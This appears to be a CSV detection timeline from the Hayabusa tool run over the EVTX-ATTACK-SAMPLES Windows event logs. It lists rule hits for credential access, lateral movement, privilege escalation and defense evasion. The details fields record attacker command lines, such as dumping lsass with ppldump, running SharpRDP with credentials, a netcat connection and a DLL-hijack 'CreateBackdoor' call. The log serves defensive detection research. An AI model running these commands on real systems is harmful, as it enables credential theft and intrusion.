2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx
2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx
2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
